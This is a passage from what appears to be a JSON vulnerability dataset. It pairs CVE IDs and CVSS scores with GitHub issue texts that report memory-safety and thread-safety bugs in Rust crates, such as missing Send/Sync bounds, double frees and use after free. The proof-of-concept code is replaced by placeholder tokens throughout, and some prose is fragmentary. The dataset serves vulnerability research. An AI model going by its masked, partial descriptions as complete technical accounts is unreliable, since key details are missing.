  86447. "severity": "MEDIUM",
  86448. "baseScore": 5.5,
  86449. "impactScore": 3.6,
  86450. "exploitabilityScore": 1.8
  86451. },
  86452. {
  86453. "CVE_ID": "CVE-2020-35928",
  86454. "Issue_Url_old": "https://github.com/kanidm/concread/issues/48",
  86455. "Issue_Url_new": "https://github.com/kanidm/concread/issues/48",
  86456. "Repo_new": "kanidm/concread",
  86457. "Issue_Created_At": "2020-11-13T22:24:55Z",
  86458. "description": "APITAG bound needed on V in APITAG . Hello! :crab: While scanning APITAG we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue Currently Send & Sync for APITAG is implemented as below. ERRORTAG In the Send impl, there is no Send bound on V . In the Sync impl, there is no Sync bound on V . It is possible to insert a non Sync item to APITAG and share it across multiple threads. Proof of Concept I wrote a minimal proof of concept that exploits this issue to cause undefined behavior in safe Rust. To observe undefined behavior, you need to run the below program in Debug mode. In the program below, multiple threads clone & drop Rc ( neither Send nor Sync ) which is inside APITAG . Since Rc 's internal APITAG is updated by multiple threads without synchronization, the program will terminate in either one of the following states. APITAG NUMBERTAG program panics at the assertion check at the end (memory leak) APITAG NUMBERTAG Rc is dropped while references to it are still alive. When run on Ubuntu NUMBERTAG program crashes with error: APITAG APITAG NUMBERTAG Not impossible, but highly unlikely ERRORTAG How to fix the issue? I think this issue can be solved by adding APITAG bounds to the current APITAG impls as below. ERRORTAG Thank you for checking out this issue NUMBERTAG cat:",
  86459. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86460. "severity": "MEDIUM",
  86461. "baseScore": 4.7,
  86462. "impactScore": 3.6,
  86463. "exploitabilityScore": 1.0
  86464. },
  86465. {
  86466. "CVE_ID": "CVE-2020-35900",
  86467. "Issue_Url_old": "https://github.com/raviqqe/array-queue/issues/2",
  86468. "Issue_Url_new": "https://github.com/raviqqe/array-queue/issues/2",
  86469. "Repo_new": "raviqqe/array-queue",
  86470. "Issue_Created_At": "2020-09-26T07:44:59Z",
  86471. "description": "array_queue pop_back should be indexed with index method.. In the APITAG function, APITAG is used as the index: URLTAG This means that after you perform a APITAG there is the potential to read from uninitialized or previously dropped memory. This can lead to a double drop and an arbitrary read primitive from safe rust. Here's a program that exhibits the read behavior: ERRORTAG The second part is a bit harder to fix. Rust now has a type called ERRORTAG that is used to safely initialize types in uninitialized memory. I'd recommend at least fixing the index problem in APITAG .",
  86472. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  86473. "severity": "MEDIUM",
  86474. "baseScore": 5.5,
  86475. "impactScore": 3.6,
  86476. "exploitabilityScore": 1.8
  86477. },
  86478. {
  86479. "CVE_ID": "CVE-2020-36219",
  86480. "Issue_Url_old": "https://github.com/reem/rust-atomic-option/issues/4",
  86481. "Issue_Url_new": "https://github.com/reem/rust-atomic-option/issues/4",
  86482. "Repo_new": "reem/rust-atomic-option",
  86483. "Issue_Created_At": "2020-10-31T20:00:59Z",
  86484. "description": "APITAG should have Sync bound on its type argument.. Currently APITAG implements Sync for any type. However, this should really be bounded by APITAG , otherwise it allows for types that were never meant to be used across threads to be smuggled across boundaries. APITAG found by APITAG See this example of using APITAG to use a Cell across thread boundaries, leading to an arbitrary pointer dereference: ERRORTAG Output: APITAG Return Code NUMBERTAG SIGSEGV)",
  86485. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86486. "severity": "MEDIUM",
  86487. "baseScore": 5.9,
  86488. "impactScore": 3.6,
  86489. "exploitabilityScore": 2.2
  86490. },
  86491. {
  86492. "CVE_ID": "CVE-2021-29935",
  86493. "Issue_Url_old": "https://github.com/SergioBenitez/Rocket/issues/1534",
  86494. "Issue_Url_new": "https://github.com/sergiobenitez/rocket/issues/1534",
  86495. "Repo_new": "sergiobenitez/rocket",
  86496. "Issue_Created_At": "2021-02-09T22:35:40Z",
  86497. "description": "Unsafe code in Formatter is not panic safe. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method converts APITAG to APITAG with the justification above. Unfortunately, the prefix is not popped if line NUMBERTAG panics. In such case, the transmuted APITAG persists in prefixes field and will lead to use after free if the formatter is accessed again. Reproduction Below is an example program that demonstrates use after free using safe APIs of APITAG . APITAG Detail APITAG APITAG The program is expected to write APITAG . However, due to the aforementioned use after free, it prints APITAG instead. ERRORTAG Output: CODETAG Tested Environment Crate: rocket_http Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG nightly NUMBERTAG caa NUMBERTAG d NUMBERTAG APITAG APITAG",
  86498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  86499. "severity": "HIGH",
  86500. "baseScore": 7.3,
  86501. "impactScore": 3.4,
  86502. "exploitabilityScore": 3.9
  86503. },
  86504. {
  86505. "CVE_ID": "CVE-2020-36445",
  86506. "Issue_Url_old": "https://github.com/krl/convec/issues/2",
  86507. "Issue_Url_new": "https://github.com/krl/convec/issues/2",
  86508. "Repo_new": "krl/convec",
  86509. "Issue_Created_At": "2020-11-24T18:41:35Z",
  86510. "description": "APITAG lacks a bound on its Send trait and Sync trait. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements the Send and Sync traits for all types: URLTAG This allows objects like Cell that don't implement Sync to be shared across threads, leading to undefined behavior. The code below crashes due to the data race. ERRORTAG",
  86511. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86512. "severity": "HIGH",
  86513. "baseScore": 8.1,
  86514. "impactScore": 5.9,
  86515. "exploitabilityScore": 2.2
  86516. },
  86517. {
  86518. "CVE_ID": "CVE-2021-26953",
  86519. "Issue_Url_old": "https://github.com/bodoni/postscript/issues/1",
  86520. "Issue_Url_new": "https://github.com/bodoni/postscript/issues/1",
  86521. "Repo_new": "bodoni/postscript",
  86522. "Issue_Created_At": "2021-01-31T01:10:10Z",
  86523. "description": "Read on uninitialized buffer may cause UB ( APITAG ). Hello fellow :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
  86524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86525. "severity": "HIGH",
  86526. "baseScore": 7.5,
  86527. "impactScore": 3.6,
  86528. "exploitabilityScore": 3.9
  86529. },
  86530. {
  86531. "CVE_ID": "CVE-2020-36460",
  86532. "Issue_Url_old": "https://github.com/spacejam/model/issues/3",
  86533. "Issue_Url_new": "https://github.com/spacejam/model/issues/3",
  86534. "Repo_new": "spacejam/model",
  86535. "Issue_Created_At": "2020-11-10T19:58:34Z",
  86536. "description": "Possible soundness issue in Shared?. Hi there, we (the Rust group at APITAG gatech) are auditing crates on crates.io for safety issues and noticed that the Shared object seems to not have bounds on its Send / Sync traits: URLTAG We weren't sure if this was intentional since this is a testing library but this can be used to create data races from safe Rust by sharing types like Cell : ERRORTAG which outputs: APITAG",
  86537. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86538. "severity": "HIGH",
  86539. "baseScore": 8.1,
  86540. "impactScore": 5.9,
  86541. "exploitabilityScore": 2.2
  86542. },
  86543. {
  86544. "CVE_ID": "CVE-2020-35864",
  86545. "Issue_Url_old": "https://github.com/google/flatbuffers/issues/5825",
  86546. "Issue_Url_new": "https://github.com/google/flatbuffers/issues/5825",
  86547. "Repo_new": "google/flatbuffers",
  86548. "Issue_Created_At": "2020-03-20T16:51:02Z",
  86549. "description": "Rust: read_scalar(_at) is unsound. The APITAG and APITAG functions are unsound because they allow doing things such as: APITAG or CODETAG or even worse: CODETAG (this last one causes a segmentation fault) APITAG is behaving similar to transmute , leading to undefined behavior for types where not all bit patterns are valid (such as bool or APITAG ) or allowing to create dangling pointers. I suggest three breaking solutions: Make APITAG and APITAG functions unsafe. Make the APITAG trait unsafe. Make the APITAG trait something like: APITAG which, for example, would be implemented for APITAG like this: CODETAG This last solution, even though it is the most disrupting one, has the advantage of not requiring any ERRORTAG at all.",
  86550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86551. "severity": "HIGH",
  86552. "baseScore": 7.5,
  86553. "impactScore": 3.6,
  86554. "exploitabilityScore": 3.9
  86555. },
  86556. {
  86557. "CVE_ID": "CVE-2020-36435",
  86558. "Issue_Url_old": "https://github.com/RusPiRo/ruspiro-singleton/issues/10",
  86559. "Issue_Url_new": "https://github.com/ruspiro/ruspiro-singleton/issues/10",
  86560. "Repo_new": "ruspiro/ruspiro-singleton",
  86561. "Issue_Created_At": "2020-11-16T16:57:41Z",
  86562. "description": "Singleton needs bounds on its APITAG traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that Singleton implements Send and Sync unconditionally: URLTAG This is guarded by a APITAG but violates APITAG 's own assumptions that Send will have APITAG and Sync will be APITAG . The way this is structured right now allows for data races from safe Rust code, for example: ERRORTAG This outputs: APITAG",
  86563. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86564. "severity": "HIGH",
  86565. "baseScore": 8.1,
  86566. "impactScore": 5.9,
  86567. "exploitabilityScore": 2.2
  86568. },
  86569. {
  86570. "CVE_ID": "CVE-2020-36453",
  86571. "Issue_Url_old": "https://github.com/rossdylan/rust-scottqueue/issues/1",
  86572. "Issue_Url_new": "https://github.com/rossdylan/rust-scottqueue/issues/1",
  86573. "Repo_new": "rossdylan/rust-scottqueue",
  86574. "Issue_Created_At": "2020-11-15T08:47:30Z",
  86575. "description": "Queue APITAG should have a Send bound on its APITAG traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the Queue object implements Send and Sync unconditionally: URLTAG However, this should probably be bounded by APITAG in both, otherwise it allows sending types that should never be sent across threads such as Rc or references to cells. You can see an example of such a data race with cells below: ERRORTAG This outputs: APITAG",
  86576. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86577. "severity": "HIGH",
  86578. "baseScore": 8.1,
  86579. "impactScore": 5.9,
  86580. "exploitabilityScore": 2.2
  86581. },
  86582. {
  86583. "CVE_ID": "CVE-2021-25906",
  86584. "Issue_Url_old": "https://github.com/liebharc/basic_dsp/issues/47",
  86585. "Issue_Url_new": "https://github.com/liebharc/basic_dsp/issues/47",
  86586. "Repo_new": "liebharc/basic_dsp",
  86587. "Issue_Created_At": "2021-01-11T02:06:52Z",
  86588. "description": "panic safety issue in APITAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description The issue is relevant to implementation of APITAG trait for APITAG , APITAG , and APITAG . URLTAG URLTAG If a panic happens within conversion , item( S ) within self can be dropped twice since the ownership of the item within self is duplicated with APITAG . Suggested Fix By keeping self within APITAG instead of using APITAG , it is possible to guard against such double drop bugs. I will immediately submit a PR containing the suggested fix. Thank you for checking out this issue NUMBERTAG",
  86589. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86590. "severity": "HIGH",
  86591. "baseScore": 7.5,
  86592. "impactScore": 3.6,
  86593. "exploitabilityScore": 3.9
  86594. },
  86595. {
  86596. "CVE_ID": "CVE-2020-35860",
  86597. "Issue_Url_old": "https://github.com/TomBebbington/cbox-rs/issues/2",
  86598. "Issue_Url_new": "https://github.com/tombebbington/cbox-rs/issues/2",
  86599. "Repo_new": "tombebbington/cbox-rs",
  86600. "Issue_Created_At": "2020-03-06T17:16:52Z",
  86601. "description": "Soundness bug. Getting a segmentation fault is as easy as: APITAG",
  86602. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86603. "severity": "CRITICAL",
  86604. "baseScore": 9.8,
  86605. "impactScore": 5.9,
  86606. "exploitabilityScore": 3.9
  86607. },
  86608. {
  86609. "CVE_ID": "CVE-2020-35924",
  86610. "Issue_Url_old": "https://github.com/mpdn/try-mutex/issues/2",
  86611. "Issue_Url_new": "https://github.com/mpdn/try-mutex/issues/2",
  86612. "Repo_new": "mpdn/try-mutex",
  86613. "Issue_Created_At": "2020-11-16T19:18:09Z",
  86614. "description": "APITAG should have Send bound on T. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Sync for all types T : URLTAG This should probably be bounded by APITAG just like the standard library's Mutex URLTAG , otherwise it allows smuggling non Send types like Rc across thread boundaries like so: ERRORTAG This outputs: APITAG and can lead to data races from safe Rust code.",
  86615. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86616. "severity": "MEDIUM",
  86617. "baseScore": 5.5,
  86618. "impactScore": 3.6,
  86619. "exploitabilityScore": 1.8
  86620. },
  86621. {
  86622. "CVE_ID": "CVE-2020-36470",
  86623. "Issue_Url_old": "https://github.com/sklose/disrustor/issues/1",
  86624. "Issue_Url_new": "https://github.com/sklose/disrustor/issues/1",
  86625. "Repo_new": "sklose/disrustor",
  86626. "Issue_Created_At": "2020-12-18T03:45:39Z",
  86627. "description": "APITAG allows sending Non Send types across threads. Hello fellow Rustacean, we APITAG group APITAG gatech) are scanning Rust code on crates.io for potential memory safety and soundness bugs and found an issue in this crate which allows safe Rust code to exhibit an undefined behavior. Issue Description URLTAG APITAG implements APITAG regardless of whether the internal type implements APITAG This allows users to send a non Send type across threads with APITAG . APITAG 's APITAG should probably have a trait bound on the internal type T , or if APITAG needs to implement APITAG and it is not meant to be created by the end user, APITAG should be hidden with APITAG or so. Reproduction Below is an example program that sends Non Send type across threads using safe APIs of disrustor . APITAG Detail APITAG APITAG This example just shows that non Send type is sent across the thread, but it is possible to demonstrate a data race with a more complicated example. ERRORTAG Output: ERRORTAG Tested Environment Crate: disrustor Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG rd party dependencies: APITAG APITAG APITAG",
  86628. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86629. "severity": "MEDIUM",
  86630. "baseScore": 5.9,
  86631. "impactScore": 3.6,
  86632. "exploitabilityScore": 2.2
  86633. },
  86634. {
  86635. "CVE_ID": "CVE-2021-45711",
  86636. "Issue_Url_old": "https://github.com/acw/simple_asn1/issues/27",
  86637. "Issue_Url_new": "https://github.com/acw/simple_asn1/issues/27",
  86638. "Repo_new": "acw/simple_asn1",
  86639. "Issue_Created_At": "2021-11-14T14:37:35Z",
  86640. "description": "Panic when decoding an invalid APITAG Hello, I hope this is the right place to report this; I didn't find any documentation for a preferred method for reporting security issues. The following code panics when trying to parse an invalid APITAG object: CODETAG The panic occurs because of these lines in lib.rs: APITAG If the string is constructed in such a way that the first two bytes do not end on a character boundary, the slice operation will panic. Found by fuzzing a downstream library. I'll submit a patch ASAP.",
  86641. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86642. "severity": "HIGH",
  86643. "baseScore": 7.5,
  86644. "impactScore": 3.6,
  86645. "exploitabilityScore": 3.9
  86646. },
  86647. {
  86648. "CVE_ID": "CVE-2020-35916",
  86649. "Issue_Url_old": "https://github.com/image-rs/image/issues/1357",
  86650. "Issue_Url_new": "https://github.com/image-rs/image/issues/1357",
  86651. "Repo_new": "image-rs/image",
  86652. "Issue_Created_At": "2020-11-12T11:39:33Z",
  86653. "description": "Undefined behavior detected by miri. I just discovered an instance of UB whilst testing another project with miri. APITAG and APITAG perform an invalid unsafe cast, which is detected by miri. Expected: APITAG should not raise any problem. Actual behaviour: APITAG triggers UB. Reproduction steps: Just run miri on the tests :relaxed:",
  86654. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86655. "severity": "MEDIUM",
  86656. "baseScore": 5.5,
  86657. "impactScore": 3.6,
  86658. "exploitabilityScore": 1.8
  86659. },
  86660. {
  86661. "CVE_ID": "CVE-2018-20991",
  86662. "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/96",
  86663. "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/96",
  86664. "Repo_new": "servo/rust-smallvec",
  86665. "Issue_Created_At": "2018-05-17T15:33:23Z",
  86666. "description": "APITAG is unsound. Gist here URLTAG . A solution to this would be to set APITAG before iterating. Obviously this would cause leaks but we're already leaking data.",
  86667. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86668. "severity": "CRITICAL",
  86669. "baseScore": 9.8,
  86670. "impactScore": 5.9,
  86671. "exploitabilityScore": 3.9
  86672. },
  86673. {
  86674. "CVE_ID": "CVE-2021-31996",
  86675. "Issue_Url_old": "https://github.com/AbrarNitk/algorithmica/issues/1",
  86676. "Issue_Url_new": "https://github.com/abrarnitk/algorithmica/issues/1",
  86677. "Repo_new": "abrarnitk/algorithmica",
  86678. "Issue_Created_At": "2021-03-07T14:46:16Z",
  86679. "description": "APITAG crashes with double free for APITAG . Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description The implementation of APITAG freely duplicates ownership of items from list , and invokes drop of the duplicated items via APITAG . A panic within APITAG can also trigger a double free of items whose ownership was duplicated via APITAG . URLTAG Reproduction Below is an example program that exhibits undefined behavior using safe APIs of algorithmica . Simply calling APITAG on an array of APITAG triggers a double free. APITAG Detail APITAG APITAG ERRORTAG Output: APITAG Tested Environment Crate: algorithmica Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
  86680. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86681. "severity": "HIGH",
  86682. "baseScore": 7.5,
  86683. "impactScore": 3.6,
  86684. "exploitabilityScore": 3.9
  86685. },
  86686. {
  86687. "CVE_ID": "CVE-2021-29933",
  86688. "Issue_Url_old": "https://github.com/rphmeier/insert_many/issues/1",
  86689. "Issue_Url_new": "https://github.com/rphmeier/insert_many/issues/1",
  86690. "Repo_new": "rphmeier/insert_many",
  86691. "Issue_Created_At": "2021-01-26T22:19:07Z",
  86692. "description": "insert_many can double free items if the iterator panics. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a potential issue in the provided APITAG implementation / APITAG macro. Namely, APITAG pushes elements over for insertion using APITAG here: URLTAG This can duplicate items in the Vec, after which it calls APITAG , which can potentially panic. This means that during this panic the copied elements can be dropped twice. Here's a quick example of this issue: ERRORTAG This outputs: CODETAG What's happening here is: v = APITAG , length NUMBERTAG Insert many called. v = APITAG , length NUMBERTAG APITAG v = APITAG , length NUMBERTAG APITAG panics APITAG gets dropped twice. We'd recommend wrapping the vector in FILETAG while performing these operations to avoid this issue.",
  86693. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86694. "severity": "HIGH",
  86695. "baseScore": 7.5,
  86696. "impactScore": 3.6,
  86697. "exploitabilityScore": 3.9
  86698. },
  86699. {
  86700. "CVE_ID": "CVE-2021-31919",
  86701. "Issue_Url_old": "https://github.com/djkoloski/rkyv/issues/113",
  86702. "Issue_Url_new": "https://github.com/rkyv/rkyv/issues/113",
  86703. "Repo_new": "rkyv/rkyv",
  86704. "Issue_Created_At": "2021-04-29T02:34:47Z",
  86705. "description": "Archives may contain uninitialized memory. During serialization, struct padding bytes and unused enum bytes may not be initialized. These bytes may be written to disk or sent over unsecured channels. This issue has been fixed as of NUMBERTAG",
  86706. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86707. "severity": "HIGH",
  86708. "baseScore": 7.5,
  86709. "impactScore": 3.6,
  86710. "exploitabilityScore": 3.9
  86711. },
  86712. {
  86713. "CVE_ID": "CVE-2020-36434",
  86714. "Issue_Url_old": "https://github.com/FillZpp/sys-info-rs/issues/63",
  86715. "Issue_Url_new": "https://github.com/fillzpp/sys-info-rs/issues/63",
  86716. "Repo_new": "fillzpp/sys-info-rs",
  86717. "Issue_Created_At": "2020-06-01T03:05:07Z",
  86718. "description": "Disk Info is not Thread Safe. I've seen a few segmentation faults when running APITAG on linux. If you call APITAG from multiple threads at once this can core dump: CODETAG There is a global APITAG : URLTAG If two threads call APITAG concurrently, the APITAG call at the end of the APITAG function runs in both threads and both try to free the same global at the same time: URLTAG This results in segfaults and double frees",
  86719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86720. "severity": "CRITICAL",
  86721. "baseScore": 9.8,
  86722. "impactScore": 5.9,
  86723. "exploitabilityScore": 3.9
  86724. },
  86725. {
  86726. "CVE_ID": "CVE-2021-45710",
  86727. "Issue_Url_old": "https://github.com/tokio-rs/tokio/issues/4225",
  86728. "Issue_Url_new": "https://github.com/tokio-rs/tokio/issues/4225",
  86729. "Repo_new": "tokio-rs/tokio",
  86730. "Issue_Created_At": "2021-11-12T01:00:56Z",
  86731. "description": "Race leads to panic in APITAG . Version Reproduced with tokio NUMBERTAG and NUMBERTAG Platform APITAG Description There is a race between APITAG , APITAG , and APITAG . The following program yields a panic roughly every NUMBERTAG seconds on my NUMBERTAG c NUMBERTAG t workstation, compiled with Rust NUMBERTAG in release mode: CODETAG All of the panics occur when APITAG attempts ERRORTAG . For example: ERRORTAG I suspect this is a race where the APITAG happens between the APITAG check and the ERRORTAG .",
  86732. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86733. "severity": "HIGH",
  86734. "baseScore": 8.1,
  86735. "impactScore": 5.9,
  86736. "exploitabilityScore": 2.2
  86737. },
  86738. {
  86739. "CVE_ID": "CVE-2020-35896",
  86740. "Issue_Url_old": "https://github.com/housleyjk/ws-rs/issues/291",
  86741. "Issue_Url_new": "https://github.com/housleyjk/ws-rs/issues/291",
  86742. "Repo_new": "housleyjk/ws-rs",
  86743. "Issue_Created_At": "2019-09-04T17:04:34Z",
  86744. "description": "out_buffer grows until allocation fails. I've been using APITAG in an application which passes images from an embedded device to a webpage, as a simple video streaming solution. On very rare occasions, the system suffers from memory exhaustion, prints something like APITAG and crashes. I've managed to trigger this situation and catch it in the debugger. The issue appears to be APITAG growing without bounds. Here's a full backtrace: ERRORTAG I tried to limit the size of APITAG by configuring APITAG in the Builder settings. The debugger confirms that these settings have been applied. However, APITAG has still grown to a much larger size than expected: ERRORTAG Specifically, APITAG is much larger than the fixed capacity of APITAG . Digging into the source, it seems like the only place this buffer is touched is APITAG URLTAG . Do you have any ideas why the buffer could be growing large enough to trigger allocation failures?",
  86745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86746. "severity": "HIGH",
  86747. "baseScore": 7.5,
  86748. "impactScore": 3.6,
  86749. "exploitabilityScore": 3.9
  86750. },
  86751. {
  86752. "CVE_ID": "CVE-2020-36446",
  86753. "Issue_Url_old": "https://github.com/kitsuneninetails/signal-rust/issues/2",
  86754. "Issue_Url_new": "https://github.com/kitsuneninetails/signal-rust/issues/2",
  86755. "Repo_new": "kitsuneninetails/signal-rust",
  86756. "Issue_Created_At": "2020-11-15T08:59:37Z",
  86757. "description": "APITAG should have a bound on T: Send. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements Send and Sync unconditionally: URLTAG However, this should probably be bounded by T: Send in both, otherwise it allows sending types that should never be sent across threads such as Rc or references to cells. You can see an example of such a data race with cells below: ERRORTAG which outputs: APITAG",
  86758. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86759. "severity": "HIGH",
  86760. "baseScore": 8.1,
  86761. "impactScore": 5.9,
  86762. "exploitabilityScore": 2.2
  86763. },
  86764. {
  86765. "CVE_ID": "CVE-2021-38191",
  86766. "Issue_Url_old": "https://github.com/tokio-rs/tokio/issues/3929",
  86767. "Issue_Url_new": "https://github.com/tokio-rs/tokio/issues/3929",
  86768. "Repo_new": "tokio-rs/tokio",
  86769. "Issue_Created_At": "2021-07-06T09:45:58Z",
  86770. "description": "Task dropped in wrong thread when aborting APITAG task. When aborting a task with APITAG , the future is dropped in the thread calling abort if the task is not currently being executed. This is incorrect for tasks spawned on a APITAG . See this example that exploits it to send a non send value to a different thread: CODETAG",
  86771. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86772. "severity": "MEDIUM",
  86773. "baseScore": 5.9,
  86774. "impactScore": 3.6,
  86775. "exploitabilityScore": 2.2
  86776. },
  86777. {
  86778. "CVE_ID": "CVE-2020-36449",
  86779. "Issue_Url_old": "https://github.com/motoras/kekbit/issues/34",
  86780. "Issue_Url_new": "https://github.com/motoras/kekbit/issues/34",
  86781. "Repo_new": "motoras/kekbit",
  86782. "Issue_Created_At": "2020-12-18T22:53:51Z",
  86783. "description": "APITAG allows sending non Send type across threads. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG implements Send trait regardless of the inner type parameter H . This definition allows safe Rust code to send non Send type across threads, which potentially causes a data race or undefined behavior. APITAG trait bound should probably be added to APITAG 's Send implementation. If all handlers are expected to be Send , then Send bound can be added to Handler trait's definition instead. Reproduction Below is an example program that shows non Send type can be sent across threads using safe APIs of kekbit . APITAG Detail APITAG APITAG ERRORTAG Output: ERRORTAG Tested Environment Crate: kekbit Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG rd party dependencies: APITAG APITAG APITAG",
  86784. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86785. "severity": "HIGH",
  86786. "baseScore": 8.1,
  86787. "impactScore": 5.9,
  86788. "exploitabilityScore": 2.2
  86789. },
  86790. {
  86791. "CVE_ID": "CVE-2019-25004",
  86792. "Issue_Url_old": "https://github.com/google/flatbuffers/issues/5530",
  86793. "Issue_Url_new": "https://github.com/google/flatbuffers/issues/5530",
  86794. "Repo_new": "google/flatbuffers",
  86795. "Issue_Created_At": "2019-09-24T20:49:59Z",
  86796. "description": "[Rust] impl Follow for bool is unsound. The implementation impl Follow for bool is defined here: URLTAG and ends up calling APITAG . APITAG is for all intents and purposes a transmute and therefore given a byte that is not exactly APITAG or APITAG will produce a value of bool that has an invalid underlying bit pattern. That is UB in Rust. Invoking it is as easy as APITAG or something along those lines.",
  86797. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86798. "severity": "CRITICAL",
  86799. "baseScore": 9.8,
  86800. "impactScore": 5.9,
  86801. "exploitabilityScore": 3.9
  86802. },
  86803. {
  86804. "CVE_ID": "CVE-2020-36216",
  86805. "Issue_Url_old": "https://github.com/petabi/eventio/issues/33",
  86806. "Issue_Url_new": "https://github.com/petabi/eventio/issues/33",
  86807. "Repo_new": "petabi/eventio",
  86808. "Issue_Created_At": "2020-12-20T05:50:21Z",
  86809. "description": "Soundness issue: Input APITAG can be misused to create a data race on an object. Hello :crab: , we APITAG group APITAG gatech) found a soundness issue in this crate while scanning Rust code on APITAG for potential vulnerabilities. Soundness Issue Send is unconditionally implemented for APITAG , so that it is possible to send APITAG to other threads even when R is not Send . ERRORTAG When APITAG is misused, it is possible to create a data race on a non Sync object. Proof of Concept The example program below creates a data race on a Cell using APITAG modified from URLTAG Multiple threads concurrently update the same Cell that counts the number of read events, causing the Cell to contain incorrect statistics. APITAG compares the value contained inside Cell with the exact number of read s that happened. APITAG is a Read object that contains a non Send object ( APITAG ) Program output is shown after the program below ERRORTAG Program output When compiled with APITAG & run on APITAG , outputs from NUMBERTAG executions of the program were as below. CODETAG Suggested Solution Simply adding trait bound APITAG to the Send impl for APITAG will allow the compiler to reject programs like the above. After the change, APITAG can no longer carry non Send objects when moving across thread boundaries. ERRORTAG Thank you very much for checking out this issue NUMBERTAG",
  86810. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86811. "severity": "MEDIUM",
  86812. "baseScore": 5.9,
  86813. "impactScore": 3.6,
  86814. "exploitabilityScore": 2.2
  86815. },
  86816. {
  86817. "CVE_ID": "CVE-2019-15546",
